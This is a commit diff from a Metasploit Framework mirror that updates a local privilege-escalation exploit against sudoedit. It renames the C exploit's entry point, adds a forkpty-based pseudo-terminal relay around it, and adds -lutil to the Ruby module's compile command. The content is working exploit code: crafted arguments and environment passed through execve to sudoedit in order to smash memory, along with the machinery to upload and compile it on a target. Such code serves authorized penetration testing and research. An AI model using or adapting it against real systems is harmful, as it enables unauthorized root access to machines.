mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-09-25 10:48:31 +02:00
Update the exploit C code to allocate it's own PTY
This commit is contained in:
parent
13dd9ac10e
commit
b9413b4103
@ -23,6 +23,12 @@
|
||||
#include <stdint.h>
|
||||
#include <unistd.h>
|
||||
#include <ctype.h>
|
||||
#include <pty.h>
|
||||
#include <termios.h>
|
||||
#include <fcntl.h>
|
||||
|
||||
#include <sys/select.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
// 512 environment variables should be enough for everyone
|
||||
#define MAX_ENVP 512
|
||||
@ -37,7 +43,7 @@ typedef struct {
|
||||
uint32_t lc_all_len;
|
||||
} target_t;
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
int exploit(int argc, char *argv[]) {
|
||||
|
||||
if (argc != 5) {
|
||||
return -1;
|
||||
@ -53,7 +59,7 @@ int main(int argc, char *argv[]) {
|
||||
target->lc_all_len = atoi(argv[4]);
|
||||
|
||||
printf(
|
||||
"using target: %s ['%s'] (%d, %d, %d, %d)\n",
|
||||
"using target: %s '%s' (%d, %d, %d, %d)\n",
|
||||
target->target_name,
|
||||
target->sudoedit_path,
|
||||
target->smash_len_a,
|
||||
@ -95,3 +101,58 @@ int main(int argc, char *argv[]) {
|
||||
execve(target->sudoedit_path, s_argv, s_envp);
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[]) {
|
||||
int master;
|
||||
pid_t pid;
|
||||
|
||||
pid = forkpty(&master, NULL, NULL, NULL);
|
||||
|
||||
if (pid < 0) {
|
||||
printf("Failed to fork\n");
|
||||
return -1;
|
||||
} else if (pid == 0) {
|
||||
if (ioctl(STDIN_FILENO, TIOCSCTTY, NULL) < 0) {
|
||||
printf("ioctl() TIOCSCTTY failed\n");
|
||||
}
|
||||
return exploit(argc, argv);
|
||||
}
|
||||
|
||||
struct termios tios;
|
||||
tcgetattr(master, &tios);
|
||||
tios.c_lflag &= ~(ECHO | ECHONL);
|
||||
tcsetattr(master, TCSAFLUSH, &tios);
|
||||
|
||||
for (;;) {
|
||||
fd_set read_fd;
|
||||
fd_set write_fd;
|
||||
fd_set except_fd;
|
||||
|
||||
FD_ZERO(&read_fd);
|
||||
FD_ZERO(&write_fd);
|
||||
FD_ZERO(&except_fd);
|
||||
|
||||
FD_SET(master, &read_fd);
|
||||
FD_SET(STDIN_FILENO, &read_fd);
|
||||
|
||||
select(master+1, &read_fd, &write_fd, &except_fd, NULL);
|
||||
|
||||
char input;
|
||||
char output;
|
||||
|
||||
if (FD_ISSET(master, &read_fd))
|
||||
{
|
||||
if (read(master, &output, 1) != -1)
|
||||
write(STDOUT_FILENO, &output, 1);
|
||||
else
|
||||
break;
|
||||
}
|
||||
|
||||
if (FD_ISSET(STDIN_FILENO, &read_fd))
|
||||
{
|
||||
read(STDIN_FILENO, &input, 1);
|
||||
write(master, &input, 1);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
|
||||
def upload_and_compile(path, data)
|
||||
upload "#{path}.c", data
|
||||
gcc_cmd = "gcc -o #{path} #{path}.c"
|
||||
gcc_cmd = "gcc -o #{path} #{path}.c -lutil"
|
||||
if session.type.eql? 'shell'
|
||||
gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
|
||||
end
|
||||
|
Loading…
Reference in New Issue
Block a user